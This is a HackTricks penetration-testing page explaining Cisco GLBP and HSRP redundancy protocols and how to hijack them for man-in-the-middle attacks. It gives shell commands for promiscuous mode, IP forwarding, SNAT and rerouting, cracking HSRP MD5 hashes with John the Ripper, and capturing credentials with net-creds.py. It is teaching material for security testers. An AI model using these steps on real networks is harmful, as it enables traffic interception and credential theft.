hacktricks/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md

# GLBP & HSRP Attacks

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>


## FHRP Hijacking Overview

### Understanding FHRP
First Hop Redundancy Protocol (FHRP) is a protocol suite ensuring network resilience by combining multiple physical routers into a single virtual entity. This enhances load distribution and fault tolerance. Cisco Systems introduced two notable FHRP protocols: GLBP and HSRP.

### GLBP Protocol Details
Developed by Cisco, GLBP (Gateway Load Balancing Protocol) operates atop the TCP/IP stack, using UDP on port 3222 for communication. Routers within a GLBP group send "hello" packets every 3 seconds. Absence of these packets for 10 seconds from a router indicates its failure. However, these timer settings are adjustable.

### GLBP Operation and Load Balancing
GLBP enables load sharing across multiple routers using a single virtual IP and various virtual MAC addresses. Every router in the group participates in forwarding packets. GLBP differs from HSRP/VRRP by offering true load balancing, which includes:

- **Host-Dependent:** Ensures a host receives the same AVF MAC address, preserving NAT configurations.
- **Round-Robin:** The default mode where AVF MAC addresses are alternately distributed.
- **Weight-based Round-Robin:** Balances load based on a predefined "Weight" metric.

### GLBP Domain Roles and Terminology
- **AVG (Active Virtual Gateway):** The primary router, distributing MAC addresses to other routers.
- **AVF (Active Virtual Forwarder):** A router handling network traffic.
- **GLBP Priority:** Decides the AVG, with a default of 100 and range from 1 to 255.
- **GLBP Weight:** Indicates the router's load level, adjustable manually or via Object Tracking.
- **GLBP Virtual IP Address:** Acts as the default gateway for connected devices.

For communication, GLBP uses the reserved multicast address 224.0.0.102 and UDP port 3222. "Hello" packets are sent every 3 seconds, and routers are marked as "dead" if a packet isn't received within 10 seconds.

### GLBP Attack Mechanism
An attacker can become the primary router by sending a GLBP packet with the highest priority value (255). This can lead to DoS or MITM attacks, allowing traffic interception or redirection.

### Executing a GLBP Attack with Loki
[Loki](https://github.com/raizo62/loki_on_kali) can perform a GLBP attack by injecting a packet with priority and weight set to 255. Pre-attack steps involve gathering information like the virtual IP address, authentication presence, and router priority values using tools like Wireshark.

Attack Steps:
1. Switch to promiscuous mode and enable IP forwarding.
2. Identify the target router and retrieve its IP.
3. Generate a Gratuitous ARP.
4. Inject a malicious GLBP packet, impersonating the AVG.
5. Assign a secondary IP address to the attacker's network interface, mirroring the GLBP virtual IP.
6. Implement SNAT for complete traffic visibility.
7. Adjust routing to ensure continued internet access through the original AVG router.

By following these steps, the attacker positions themselves as a "man in the middle," capable of intercepting and analyzing network traffic, including unencrypted or sensitive data.

For demonstration, here are the required command snippets:

```bash
# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

# Configure secondary IP and SNAT
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Adjust routing
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
```

Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network.

### Passive Explanation of HSRP Hijacking with Command Details

#### Overview of HSRP (Hot Standby Router/Redundancy Protocol)
HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management.

#### Roles and Terminology in HSRP
- **HSRP Active Router**: The device acting as the gateway, managing traffic flow.
- **HSRP Standby Router**: A backup router, ready to take over if the active router fails.
- **HSRP Group**: A set of routers collaborating to form a single resilient virtual router.
- **HSRP MAC Address**: A virtual MAC address assigned to the logical router in the HSRP setup.
- **HSRP Virtual IP Address**: The virtual IP address of the HSRP group, acting as the default gateway for connected devices.

#### HSRP Versions
HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacity, multicast IP usage, and virtual MAC address structure. The protocol utilizes specific multicast IP addresses for service information exchange, with Hello packets sent every 3 seconds. A router is presumed inactive if no packet is received within a 10-second interval.

#### HSRP Attack Mechanism
HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis.

#### Steps for Bypassing HSRP Authentication
1. Save the network traffic containing HSRP data as a .pcap file.
   ```shell
   tcpdump -w hsrp_traffic.pcap
   ```
2. Extract MD5 hashes from the .pcap file using hsrp2john.py.
    ```shell
    python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
    ```
3. Crack the MD5 hashes using John the Ripper.
    ```shell
    john --wordlist=mywordlist.txt hsrp_hashes
    ```

**Executing HSRP Injection with Loki**

1. Launch Loki to identify HSRP advertisements.
2. Set the network interface to promiscuous mode and enable IP forwarding.
    ```shell
    sudo ip link set eth0 promisc on
    sudo sysctl -w net.ipv4.ip_forward=1
    ```
3. Use Loki to target the specific router, input the cracked HSRP password, and perform necessary configurations to impersonate the Active Router.
4. After gaining the Active Router role, configure your network interface and IP tables to intercept the legitimate traffic.
    ```shell
    sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
    sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    ```
5. Modify the routing table to route traffic through the former Active Router.
    ```shell
    sudo route del default
    sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
    ```
6. Use net-creds.py or a similar utility to capture credentials from the intercepted traffic.
    ```shell
    sudo python2 net-creds.py -i eth0
    ```

Executing these steps places the attacker in a position to intercept and manipulate traffic, similar to the procedure for GLBP hijacking. This highlights the vulnerability in redundancy protocols like HSRP and the need for robust security measures.


# References
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)



<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>